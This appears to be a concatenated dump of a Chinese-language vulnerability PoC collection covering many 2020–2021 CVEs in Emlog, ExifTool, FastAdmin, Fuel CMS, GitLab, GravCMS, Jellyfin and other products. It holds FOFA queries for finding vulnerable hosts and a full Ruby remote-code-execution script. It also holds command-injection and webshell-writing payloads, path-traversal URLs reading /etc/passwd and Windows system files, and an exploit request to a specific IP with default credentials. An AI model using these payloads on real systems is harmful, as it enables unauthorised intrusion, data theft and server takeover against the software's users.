)
15 | * 3.启动调试
16 |
17 | 复现视频:https://github.com/eclipse-theia/theia/files/4293788/Theia_PoC.zip
18 |
19 | ref:
20 |
21 | * https://nvd.nist.gov/vuln/detail/CVE-2021-28162
22 | * https://github.com/eclipse-theia/theia/issues/7283
--------------------------------------------------------------------------------
/Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737).md:
--------------------------------------------------------------------------------
1 | # Emlog v5.3.1 - v6.0.0 后台 RCE(CVE-2021-31737)
2 |
3 | 由于在admin/data.php中上传了数据库备份文件,因此emlog v5.3.1和emlog v6.0.0具有远程执行代码漏洞。
4 |
5 | 影响版本:
6 |
7 | * Emlog v5.3.1
8 | * Emlog v6.0.0
9 |
10 | PoC:
11 |
12 | ```
13 | select "" into outfile "/var/www/html/tet1/emlog_6.0.0/src/content/uploadfile/202104/222.php";
14 |
15 | ```
16 |
17 | 通过在后台数据-备份数据库进行构造恶意sql语句进行备份上传-getshell
18 |
19 | ref:
20 |
21 | * https://nvd.nist.gov/vuln/detail/CVE-2021-31737
22 | * https://github.com/emlog/emlog/issues/82
23 |
--------------------------------------------------------------------------------
/Emlog v6.0.0 ZIP插件GETSHELL(CVE-2020-21585).md:
--------------------------------------------------------------------------------
1 | # Emlog v6.0.0 ZIP插件GETSHELL(CVE-2020-21585)
2 |
3 | emlog v6.0.0中的漏洞允许用户通过zip插件模块上传webshell。
4 |
5 | **PoC:**
6 |
7 | ```
8 | http://x.x.x.x/emlog/src/admin/plugin.php
9 | 编辑一个ZIP包,包含xx/xx.php
10 | 访问之:http://127.0.0.1/emlog/src/content/plugins/abc/abc.php
11 | ```
12 |
13 | ref:
14 |
15 | * https://nvd.nist.gov/vuln/detail/CVE-2020-21585
16 | * https://github.com/pwnninja/emlog/issues/1
--------------------------------------------------------------------------------
/ExifTool 任意代码执行漏洞 (CVE-2021-22204).md:
--------------------------------------------------------------------------------
1 | # ExifTool 任意代码执行漏洞 (CVE-2021-22204)
2 |
3 |
4 | ExifTool 7.44及更高版本中,对DjVu文件格式中的用户数据进行不正确的中和,允许在解析恶意图像时执行任意代码。
5 |
6 | Metasploit module:https://github.com/rapid7/metasploit-framework/pull/15185
7 |
8 | poc:
9 |
10 | ```
11 | $ printf 'P1 1 1 0' > moo.pbm
12 | $ cjb2 moo.pbm moo.djvu
13 | $ printf 'ANTa\0\0\0\40"(xmp(\\\n".qx(cowsay pwned>&2);#"' >> moo.djvu
14 | $ exiftool moo.djvu > /dev/null
15 | _______
16 | < pwned >
17 | -------
18 | \ ^__^
19 | \ (oo)\_______
20 | (__)\ )\/\
21 | ||----w |
22 | || ||
23 | ```
24 |
25 | ref:
26 |
27 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22204
28 | * https://twitter.com/wcbowling/status/1385803927321415687
29 | * https://www.openwall.com/lists/oss-security/2021/05/10/5
30 | * https://github.com/se162xg/CVE-2021-22204
--------------------------------------------------------------------------------
/FastAdmin 框架远程代码执行漏洞.md:
--------------------------------------------------------------------------------
1 | # FastAdmin 框架远程代码执行漏洞
2 |
3 |
4 | FastAdmin是一款基于ThinkPHP和Bootstrap的极速后台开发框架。FastAdmin框架存在有条件RCE漏洞,当攻击者具有一定用户权限的前提下,可以实现任意文件上传,导致RCE。
5 |
6 | FOFA:
7 |
8 | ```
9 | app="FASTADMIN-框架" || body="\"uploadurl\":\"ajax\/upload\"" || body="api.fastadmin.net" || body="\"fastadmin\":{\"usercenter\":true" || body="content=\"FastAdmin\"" || body="cdnurl\":\"\",\"version"|| icon_hash="-1036943727"
10 | ```
11 |
12 | 详细分析可以见:https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
13 |
14 | 条件:
15 |
16 | * 普通用户
17 | * chunking = true (开启分片上传功能)
18 |
19 | 上传头像处post:
20 |
21 | ```
22 | //传入xx.php
23 | POST /index/ajax/upload HTTP/1.1
24 | Host: target
25 |
26 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
27 | Content-Disposition: form-data; name="file"; filename="Xnip2021-04-02_11-05-27.png"
28 | Content-Type: application/octet-stream
29 |
30 | PNG
31 | ...
32 |
33 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
34 | Content-Disposition: form-data; name="chunkid"
35 |
36 | xx.php
37 |
38 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
39 | Content-Disposition: form-data; name="chunkindex"
40 |
41 | 0
42 | ------WebKitFormBoundarybw5c2a2bqlLLOMEU
43 | ```
44 |
45 | 
46 |
47 |
48 | ref:
49 |
50 | * https://mp.weixin.qq.com/s/otrH75ZjCHBQbRB7g5DdWg
51 | * https://mp.weixin.qq.com/s/XP9t0TkObawMTSb41Z13gw
52 | * https://nosec.org/home/detail/4713.html
53 | * https://forum.ywhack.com/thread-115352-1-6.html
--------------------------------------------------------------------------------
/FortiLogger-未经身份验证的任意文件上传(CVE-2021-3378).md:
--------------------------------------------------------------------------------
1 | # FortiLogger-未经身份验证的任意文件上传(CVE-2021-3378)
2 |
3 | FortiLogger是一个基于Web的日志记录和报告软件,专门为在Windows操作系统上运行的FortiGate防火墙而设计。它包含即时状态跟踪,日志记录,搜索/过滤,报告和热点等功能。
4 |
5 | 在“热点设置” 下上传公司徽标时发现了此漏洞http://:5000/config/hotspotsettings)。可以向匿名用户发送没有任何身份验证或会话标头的文件,但POST要求是/Config/SaveUploadedHotspotLogoFile。
6 |
7 | 文件在C:\Program Files\RZK\Fortilogger\Web\Assets\temp\hotspot\img目标logohotspot名称下上传,而没有控制文件扩展名或内容。
8 |
9 | 漏洞详情:https://erberkan.github.io/2021/cve-2021-3378/
10 |
11 | msf exploit:https://github.com/erberkan/fortilogger_arbitrary_fileupload
12 |
13 | 另外的两个漏洞,信息泄露和无需任何授权即可创建用户,利用脚本可在https://erberkan.github.io/2021/cve-2021-3378/找到。
14 |
15 |
--------------------------------------------------------------------------------
/Fuel CMS 1.4.1 远程代码执行.md:
--------------------------------------------------------------------------------
1 | # Fuel CMS 1.4.1 远程代码执行
2 |
3 | FOFA:
4 |
5 | ```
6 | "Fuel CMS"
7 | ```
8 |
9 | PoC:
10 |
11 | ```bash
12 | /fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'
13 | ```
14 |
15 | ```ruby
16 | #!/usr/bin/env ruby
17 |
18 | require 'httpclient'
19 | require 'docopt'
20 |
21 | # dirty workaround to ignore Max-Age
22 | # https://github.com/nahi/httpclient/issues/242#issuecomment-69013932
23 | $VERBOSE = nil
24 |
25 | doc = <<~DOCOPT
26 | Fuel CMS 1.4 - Remote Code Execution
27 |
28 | Usage:
29 | #{__FILE__}
30 | #{__FILE__} -h | --help
31 |
32 | Options:
33 | Root URL (base path) including HTTP scheme, port and root folder
34 | The system command to execute
35 | -h, --help Show this screen
36 |
37 | Examples:
38 | #{__FILE__} http://example.org id
39 | #{__FILE__} https://example.org:8443/fuelcms 'cat /etc/passwd'
40 | DOCOPT
41 |
42 | def exploit(client, root_url, cmd)
43 | url = root_url + "/fuel/pages/select/?filter='%2Bpi(print(%24a%3D'system'))%2B%24a('#{cmd}')%2B'"
44 |
45 | res = client.get(url)
46 |
47 | /system(.+?)
'], args[''])
54 | rescue Docopt::Exit => e
55 | puts e.message
56 | end
57 |
58 | ```
59 |
60 | ref:
61 |
62 | * https://github.com/nahi/httpclient/issues/242
63 | * https://www.exploit-db.com/exploits/49487
--------------------------------------------------------------------------------
/Git CLI远程代码执行漏洞(CVE-2020-26233).md:
--------------------------------------------------------------------------------
1 | # Git CLI远程代码执行漏洞(CVE-2020-26233)
2 |
3 | src/shared/Microsoft.Git.CredentialManager/CommandContext.cs的代码:
4 |
5 | 
6 |
7 | 第89行中,将创建一个搜索git.exe的新进程,并将Environment.LocateExecutable('git.exe')作为目录路径参数传递给GitProcess()函数。
8 |
9 | **利用步骤:**
10 |
11 | * a)创建一个新的存储库或将文件添加到现有存储库;
12 | * b)将Windows可执行文件上传到此存储库,重命名为git.exe;
13 | * c)等待受害者fork存储库
14 |
15 | 
16 |
17 |
18 | 使用gh repo fork REPOSITORY_NAME --clone frok后触发rce:
19 |
20 |
21 | 
22 |
23 |
24 | ref:
25 |
26 | * https://github.com/microsoft/Git-Credential-Manager-Core/security/advisories/GHSA-2gq7-ww4j-3m76
27 | * https://wildfire.blazeinfosec.com/attack-of-the-clones-2-git-command-client-remote-code-execution-strikes-back/
28 | * https://github.com/microsoft/Git-Credential-Manager-Core/blob/c3a543a1352dba953e027f7a92ee4a94b2293a22/src/shared/Microsoft.Git.CredentialManager/CommandContext.cs#L89-L93
29 | * https://forum.ywhack.com/thread-115014-1-1.html
--------------------------------------------------------------------------------
/Git LFS 远程代码执行漏洞 CVE-2020–27955.md:
--------------------------------------------------------------------------------
1 | # Git LFS 远程代码执行漏洞 CVE-2020–27955
2 |
3 | 2020年11月5日,在Git扩展之一GIT LFS上发现了一个关键漏洞。此漏洞利用成功会导致目标机器的远程代码执行。
4 |
5 | 远程代码执行漏洞仅对Windows平台上的Git-LFS(git-lfs)版本<=2.12上有效。一旦受害者克隆了恶意存储库,并在他们的系统上运行了易受攻击版本的git-lfs,恶意Payload就会立即执行。
6 |
7 | 漏洞验证:
8 |
9 | 在CMD窗口上使用以下命令。如果安装了受影响的git-lfs工具,系统将提示您使用计算器应用程序。
10 |
11 |
12 | ```
13 | 1. mkdir C:\Windows\Temp\poc
14 | 2. cd C:\Windows\Temp\poc
15 | 3. echo calc.exe > git.cmd
16 | 4. git-lfs track
17 | ```
18 |
19 | 在目标系统上获得RCE
20 |
21 | 按照以下步骤进行远程代码执行
22 |
23 | 作为攻击者:
24 |
25 | 1.在GitHub上创建一个存储库
26 |
27 | 
28 |
29 |
30 |
31 | ```
32 | 2. cd /dev/shm
33 | 3. git clone https://github.com/attacker/poc.git .
34 | 4. echo calc.exe > git.cmd
35 | 5. git lfs track “*.dat”
36 | 6. echo “Junk” > large.dat
37 | 7. git add -A
38 | 8. git commit -m “POC”
39 | 9. git push -u origin master -f
40 | ```
41 |
42 | 
43 |
44 |
45 | 受害者:
46 |
47 | 1.git clone https://github.com/attacker/poc.git.
48 |
49 | 
50 |
51 | PoC视频:
52 |
53 | https://www.youtube.com/watch?v=WF69X9KEayE
54 |
55 | 加固建议:
56 |
57 | 更新并保持 git 版本高于 2.29.2,将 git-lfs 扩展程序保持在 2.12 以上
58 |
59 |
60 | ref:
61 |
62 | https://medium.com/bugbountywriteup/git-lfs-exploit-for-remote-code-execution-cve-2020-27955-e8f4786163c3
63 |
64 | https://forum.ywhack.com/thread-114744-1-4.html
--------------------------------------------------------------------------------
/GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413).md:
--------------------------------------------------------------------------------
1 | # GitLab Graphql 邮件地址信息泄露 (CVE-2020-26413)
2 |
3 | GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名
4 |
5 | 影响版本:
6 |
7 | GitLab 13.4 - 13.6.2
8 |
9 | 可以先通过接口进行遍历用户名,然后再枚举用户的邮箱...
10 |
11 |
12 | ```
13 | https://xxx/api/v4/users/x
14 | ```
15 |
16 | poc:
17 |
18 | ```
19 | http://xxx.xxx.xxx.xxx/-//graphql-explorer
20 | query {
21 | user(username:"root"){
22 | email
23 | username
24 | }
25 | }
26 | ```
27 |
28 | ref:
29 |
30 | * https://mp.weixin.qq.com/s/3cT8d9I7qru2tsURqUDusw
31 | * https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
32 | * https://nvd.nist.gov/vuln/detail/CVE-2020-26413
33 | * https://gitlab.com/gitlab-org/gitlab/-/issues/244275
--------------------------------------------------------------------------------
/Gitlab Kramdown RCE(CVE-2021-22192).md:
--------------------------------------------------------------------------------
1 | # Gitlab Kramdown RCE(CVE-2021-22192)
2 |
3 | chen师傅的分析:https://wx.zsxq.com/dweb2/index/group/555848225184
4 |
5 | 复现步骤可以见:https://hackerone.com/reports/1125425
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Gitlab SSRF-信息泄漏漏洞 (CVE-2021-22178-CVE-2021-22176).md:
--------------------------------------------------------------------------------
1 | # Gitlab SSRF/信息泄漏漏洞 (CVE-2021-22178/CVE-2021-22176)
2 |
3 | CVE-2021-22176
4 |
5 | GitLab 中存在一个信息泄露漏洞,不当的访问控制使降级的项目成员可以访问创作者的合并请求的详细信息。
6 |
7 | CVE-2021-22178
8 |
9 | 在GitLab中发现了一个问题,影响了从13.2开始的所有版本。Gitlab通过Prometheus集成容易受到SRRF攻击。
10 |
11 | 两个漏洞的PoC可以见:
12 |
13 | * CVE-2021-22176:https://gitlab.com/gitlab-org/gitlab/-/issues/243491
14 | * CVE-2021-22178:https://gitlab.com/gitlab-org/gitlab/-/issues/284819
15 |
16 | ref:
17 |
18 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22176
19 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22178
--------------------------------------------------------------------------------
/Gitlab 敏感信息泄露漏洞 (CVE-2021-22188).md:
--------------------------------------------------------------------------------
1 | # Gitlab 敏感信息泄露漏洞 (CVE-2021-22188)
2 |
3 | 通过该漏洞,未经授权的远程攻击者可以通过分支日志读取issue title
4 |
5 | 影响版本:
6 |
7 | GitLab >13.0
8 |
9 | 复现步骤:
10 |
11 |
12 | * 1.创建一个公共项目
13 | * 2.在此公共项目中创建一个机密问题
14 | * 3.在该公共项目中创建一个提交,并将提交消息设置为“Solves #”
15 | * 4.然后打开一个新的浏览器,使用非步骤1中创建项目的成员其它账户访问URL:
16 |
17 | ```
18 | http://host///-/refs//logs_tree/?format=json&offset=0
19 | ```
20 |
21 | ref:
22 |
23 | * https://nvd.nist.gov/vuln/detail/CVE-2021-22188
24 | * https://hackerone.com/reports/916340
--------------------------------------------------------------------------------
/GravCMS未经身份验证的任意YAML写入-RCE(CVE-2021-21425).md:
--------------------------------------------------------------------------------
1 | # GravCMS未经身份验证的任意YAML写入/RCE(CVE-2021-21425)
2 |
3 | 详情分析可以见:https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/
4 |
5 | 任意YAML文件写入:
6 |
7 | * 1 –访问hxxp://target/admin URL.。
8 | * 2 –获取cookie并从登录表单中提取admin-nonce值。
9 | * 3-执行以下POST请求。
10 |
11 |
12 | ```
13 | POST /admin/config/site HTTP/1.1
14 | HOST: target
15 | ...
16 |
17 | task=SavaDefault&data[title]=PWNED&admin-nonce=xxx
18 | ```
19 |
20 | rce:
21 |
22 | ```
23 | POST /admin/config/scheduler HTTP/1.1
24 | Host: 192.168.179.131
25 | Content-Length: 348
26 | Cache-Control: max-age=0
27 | Upgrade-Insecure-Requests: 1
28 | Origin: http://192.168.179.131
29 | Content-Type: application/x-www-form-urlencoded
30 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
31 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
32 | Referer: http://192.168.179.131/admin/forgot
33 | Accept-Encoding: gzip, deflate
34 | Accept-Language: en-US,en;q=0.9
35 | Cookie: grav-site-1dfbe94-admin=s2pca2cleqg78u8iit6v593h60
36 | Connection: close
37 | task=SaveDefault&data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bcommand%5D=/usr/bin/echo
38 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bargs%5D=1337
39 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Bat%5D=*+*+*+*+*
40 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput%5D=/tmp/1.txt
41 | &data%5Bcustom_jobs%5D%5Bmdisec21%5D%5Boutput_mode%5D=append
42 | &admin-nonce=b78bb0a12604579896f9b4796dde8833
43 | ```
44 |
45 | ref:
46 |
47 | * https://nvd.nist.gov/vuln/detail/CVE-2021-21425
48 | * https://github.com/getgrav/grav-plugin-admin/security/advisories/GHSA-6f53-6qgv-39pj
49 | * https://pentest.blog/unexpected-journey-7-gravcms-unauthenticated-arbitrary-yaml-write-update-leads-to-code-execution/
--------------------------------------------------------------------------------
/H3C-SecPath-运维审计系统(堡垒机)任意用户登录.md:
--------------------------------------------------------------------------------
1 | # H3C-SecPath-运维审计系统(堡垒机)任意用户登录
2 |
3 | H3C SecPath 运维审计系统是基于用户现阶段面临的运维难题提出的一款运维风险管控产品。攻击者可通过输入特殊 url,达到任意用户登录的目的。
4 |
5 | FOFA:
6 |
7 | `app="H3C-SecPath-运维审计系统"`
8 |
9 | 影响版本:
10 | 2018
11 |
12 | PoC:
13 |
14 | ```
15 | http://target/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
16 | ```
17 |
18 | ref:
19 |
20 | https://nox.qianxin.com/vulnerability/detail/97202
--------------------------------------------------------------------------------
/HTTP协议栈远程代码执行漏洞(CVE-2021-31166).md:
--------------------------------------------------------------------------------
1 | # HTTP协议栈远程代码执行漏洞(CVE-2021-31166)
2 |
3 |
4 | 该漏洞存在于HTTP 协议栈 (http.sys) 的处理程序中,未经身份验证的远程攻击者可通过向目标主机发送特制数据包来进行利用,从而在目标系统上以内核身份执行任意代码。CVSS评分为9.8。
5 |
6 | 影响版本
7 |
8 | * Windows Server, version 20H2 (Server Core Installation)
9 | * Windows 10 Version 20H2 for ARM64-based Systems
10 | * Windows 10 Version 20H2 for 32-bit Systems
11 | * Windows 10 Version 20H2 for x64-based Systems
12 | * Windows Server, version 2004 (Server Core installation)
13 | * Windows 10 Version 2004 for x64-based Systems
14 | * Windows 10 Version 2004 for ARM64-based Systems
15 | * Windows 10 Version 2004 for 32-bit Systems
16 |
17 | PoC.py:
18 |
19 |
20 | ```
21 | import requests
22 | import argparse
23 |
24 | def main():
25 | parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
26 | parser.add_argument('--target', required = True)
27 | args = parser.parse_args()
28 | r = requests.get(f'http://{args.target}/', headers = {
29 | 'Accept-Encoding': 'doar-e, ftw, imo, ,',
30 | })
31 | print(r)
32 |
33 | main()
34 | ```
35 |
36 | ref:
37 |
38 | * https://github.com/0vercl0k/CVE-2021-31166
39 | * http://blog.nsfocus.net/cve-2021-31166/
40 | * https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31166
--------------------------------------------------------------------------------
/IBOS酷办公系统 后台命令执行.md:
--------------------------------------------------------------------------------
1 | # IBOS酷办公系统 后台命令执行
2 |
3 | FOFA:
4 |
5 | ```
6 | body="IBOS" && body="login-panel"
7 | ```
8 |
9 | 利用条件
10 |
11 | * IBOS_4.5.5及以前的版本
12 | * 需要具备后台登陆权限
13 |
14 | **PoC:**
15 |
16 | 登录之后点击管理后台。
17 |
18 | 在后台管理中找到通用设置,在数据库的备份中选择更多选项,数据备份方式选择系统 MySQL Dump (Shell) 备份,然后提交。
19 |
20 | 拦截此数据包,修改其中的filename参数,会在根目录生成2021.php
21 |
22 | ```
23 | 2021%26echo "">2021%PATHEXT:~0,1%php%262021
24 | ```
25 |
26 | via:xzuser@https://xz.aliyun.com/t/9115
--------------------------------------------------------------------------------
/IE 脚本引擎 jscript9.dll 内存损坏漏洞(CVE-2021-26419).md:
--------------------------------------------------------------------------------
1 | # IE 脚本引擎 jscript9.dll 内存损坏漏洞(CVE-2021-26419)
2 |
3 | IE 脚本引擎存在远程代码执行漏洞,攻击者可通过诱导用户打开特制网站来利用此漏洞,从而在目标设备上执行任意代码。
4 |
5 |
6 | poc见:https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26419
7 |
8 |
--------------------------------------------------------------------------------
/Internet Explorer内存损坏漏洞(CVE-2021-26411).md:
--------------------------------------------------------------------------------
1 | # Internet Explorer内存损坏漏洞(CVE-2021-26411)
2 |
3 |
4 | Interne Explorer在处理DOM对象时,存在一处double free漏洞,攻击者可通过诱导用户点击恶意链接或文件来利用此漏洞,此漏洞可导致远程代码执行,从而使攻击者控制用户系统。该漏洞细节已公开,并检测到在野利用。
5 |
6 | 漏洞详情可以参考:https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html
7 |
8 | PoC:
9 |
10 |
11 | ```js
12 |
29 | ```
30 |
31 | ref:
32 |
33 | * https://msrc.microsoft.com/updat ... lity/CVE-2021-26411
34 | * https://nvd.nist.gov/vuln/detail/CVE-2021-26411
35 | * https://iamelli0t.github.io/2021/03/12/CVE-2021-26411.html
36 |
--------------------------------------------------------------------------------
/Ivanti Avalanche 目录遍历漏洞.md:
--------------------------------------------------------------------------------
1 | # Ivanti Avalanche 目录遍历漏洞
2 |
3 |
4 | Ivanti Avalanche是一种移动设备管理系统。Ivanti Avalanche中的一个漏洞允许未经身份验证的远程用户请求位于“ image”文件夹之外的文件。
5 |
6 | 影响版本:
7 |
8 | Windows v6.3.2.3490 的 Avalanche Premise 6.3.2
9 |
10 | PoC:
11 |
12 |
13 | ```
14 | 数据库读取:
15 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf
16 |
17 | 其它:
18 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Windows/system32/config/system.sav
19 | https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/sysprep/sysprep.inf
20 |
21 | ```
22 |
23 | ref:
24 |
25 | https://ssd-disclosure.com/ssd-advisory-ivanti-avalanche-directory-traversal/
--------------------------------------------------------------------------------
/JD-FreeFuck 后台命令执行漏洞.md:
--------------------------------------------------------------------------------
1 | # JD-FreeFuck 后台命令执行漏洞
2 |
3 | JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器
4 |
5 | 项目地址:https://github.com/meselson/JD-FreeFuck
6 |
7 | FOFA:
8 |
9 | ```
10 | title="京东薅羊毛控制面板"
11 | ```
12 |
13 | 默认账号密码为
14 |
15 | `useradmin/supermanito`
16 |
17 | PoC:
18 |
19 | ```bash
20 | POST /runCmd HTTP/1.1
21 | Host: 101.200.189.251:5678
22 | Content-Length: 50
23 | Pragma: no-cache
24 | Cache-Control: no-cache
25 | Accept: */*
26 | X-Requested-With: XMLHttpRequest
27 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
28 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8
29 | Accept-Encoding: gzip, deflate
30 | Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
31 | Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
32 | Connection: close
33 |
34 | cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
35 | ```
36 |
37 | from:https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
--------------------------------------------------------------------------------
/JEEWMS 未授权任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # JEEWMS 未授权任意文件读取漏洞
2 |
3 | 厦门市灵鹿谷科技有限公司 JEEWMS /systemController/showOrDownByurl.do文件 存在未授权任意文件读取漏洞,攻击者可利用该漏洞获取服务器文件,导致大量敏感信息泄露.
4 |
5 |
6 | ```
7 | http://target/systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini
8 | http://target/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd
9 | ```
10 |
11 | ref:
12 |
13 | https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=4033
--------------------------------------------------------------------------------
/Jellyfin 任意文件读取(CVE-2021-21402).md:
--------------------------------------------------------------------------------
1 | # Jellyfin 任意文件读取(CVE-2021-21402)
2 |
3 | Jellyfin是一个免费软件媒体系统。在10.7.1版之前的Jellyfin中,带有某些终结点的精心设计的请求将允许从Jellyfin服务器的文件系统中读取任意文件。
4 |
5 | fofa:
6 |
7 | ```
8 | title="Jellyfin"
9 | ```
10 |
11 | 任意文件读取:
12 |
13 | ```
14 | //以下请求jellyfin.db将从服务器下载带有密码的数据库
15 | GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1
16 | GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1
17 | ```
18 |
19 | 
20 |
21 |
22 | ref:
23 |
24 | * https://nvd.nist.gov/vuln/detail/CVE-2021-21402
25 | * https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
26 | * https://forum.ywhack.com/thread-115353-1-7.html
--------------------------------------------------------------------------------
/Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616).md:
--------------------------------------------------------------------------------
1 | # Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616)
2 |
3 | POST请求表单中的ACL规则集的格式: jform[rules][core.PERMISSION][GROUP_ID]
4 |
5 | ```
6 | jform[rules][core.delete][ID]
7 | jform[rules][core.edit][ID]
8 | jform[rules][core.edit.state][ID]
9 | jform[rules][core.edit.own][ID]
10 | ```
11 |
12 | 如果将这些POST请求参数设置为值1,则基本上将这些特定权限设置为Allowed
13 |
14 | **PoC:**
15 |
16 | ```
17 | POST administrator/index.php?option={Target Category}
18 | ...
19 | ...
20 | ...
21 | &jform[rules][core.{create|delete|edit}][AttackerID]=1
22 | ```
23 |
24 | 如上所述,我们希望向组ID为7的管理员授予所有权限。因此,在保存表单时,我们需要附加以下POST数据:
25 |
26 | ```
27 | &jform[rules][core.create][7]=1&jform[rules][core.delete][7]=1&jform[rules][core.edit][7]=1&jform[rules][core.edit.state][7]=1&jform[rules][core.edit.own][7]=1
28 | ```
29 |
30 | 
31 |
32 |
33 | PoC验证视频:
34 | https://youtu.be/AZr6WydbUA0
35 |
36 | 详细分析文章见:https://blog.securelayer7.net/latest-joomla-exploit-cve-2020-35616-acl-security-vulnerabilities/
--------------------------------------------------------------------------------
/Joomla com_media 后台 RCE (CVE-2021-23132).md:
--------------------------------------------------------------------------------
1 | # Joomla com_media 后台 RCE (CVE-2021-23132)
2 |
3 | 影响版本:
4 |
5 | Joomla core <=3.9.24
6 |
7 | * CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE.
8 | * CVE-2020-24597 Directory traversal in com_media to RCE
9 |
10 |
11 | 步骤:
12 |
13 | 获取超级管理员权限,触发RCE。
14 |
15 | **PoC:**
16 |
17 | ```
18 | http://target/templates/protostar/error.php?cmd=ls
19 | python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls
20 | ```
21 |
22 | poc.py:https://github.com/HoangKien1020/CVE-2021-23132
--------------------------------------------------------------------------------
/KEADCOM 数字系统接入网关任意文件读取漏洞.md:
--------------------------------------------------------------------------------
1 | # KEADCOM 数字系统接入网关任意文件读取漏洞
2 |
3 |
4 | KEADCOM 数字系统接入网关 FileDownloadServlet 存在任意文件读取漏洞,攻击者通过构造请求可以读取服务器任意文件。
5 |
6 |
7 | fofa:
8 |
9 | ```
10 | (app="KEDACOM-DVR接入网关") && (is_honeypot=false && is_fraud=false)
11 | ```
12 |
13 | poc:
14 |
15 | ```
16 | http://target//gatewayweb/FileDownloadServlet?fileName=pq.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
17 |
18 | ```
19 |
20 | ref:
21 |
22 | https://poc.shuziguanxing.com/#/publicIssueInfo#issueId=3969
--------------------------------------------------------------------------------
/Kubernetes 准入机制绕过(CVE-2021-25735).md:
--------------------------------------------------------------------------------
1 | # Kubernetes 准入机制绕过(CVE-2021-25735)
2 |
3 | 在kube-apiserver中发现一个漏洞,该漏洞可能允许节点更新绕过Validation Admission Webhook。如果攻击者具有足够的权限,并且利用旧 Node 对象属性(例如 Node.NodeSpec 中的字段)实现了验证准入网络钩子,则攻击者可以更新节点的属性,这可能会导致集群受到危害。
4 |
5 | 影响版本:
6 |
7 | * kube-apiserver v1.20.0 至 v1.20.5
8 | * kube-apiserver v1.19.0 至 v1.19.9
9 | * kube-apiserver <= v1.18.17
10 |
11 | 利用CVE-2021-25735:
12 |
13 | 通过执行组合操作将changeAllowed标签更改为true并添加一个新标签,触发该漏洞,新的值已被准入控制器覆盖。
14 |
15 |
16 | ```
17 | labels:
18 | test: test
19 | changeAllowed: "true"
20 | ```
21 |
22 | 详情可以参考:https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/
23 |
24 | ref:
25 |
26 | * https://sysdig.com/blog/cve-2021-25735-kubernetes-admission-bypass/
27 | * https://github.com/darryk10/CVE-2021-25735
28 | * https://nvd.nist.gov/vuln/detail/CVE-2021-25735
29 | * https://cloud.google.com/kubernetes-engine/docs/security-bulletins
--------------------------------------------------------------------------------
/LightCMS 存储型XSS(CVE-2021-3355).md:
--------------------------------------------------------------------------------
1 | # LightCMS 存储型XSS(CVE-2021-3355)
2 |
3 | lightCMS 是一个轻量级的 CMS 系统,也可以作为一个通用的后台管理框架使用。lightCMS 集成了用户管理、权限管理、日志管理、菜单管理等后台管理框架的通用功能,同时也提供模型管理、分类管理等 CMS 系统中常用的功能。LightCMSv1.3.4版本中发现了一个持久性XSS漏洞。
4 |
5 | 影响版本:
6 |
7 | LightCMS v1.3.4
8 |
9 | **复现步骤:**
10 |
11 | * 1.登录后台
12 | * 2.访问:/admin/SensitiveWords/create 新增敏感词中的专有词值(exclusive)中填入Payload即可。
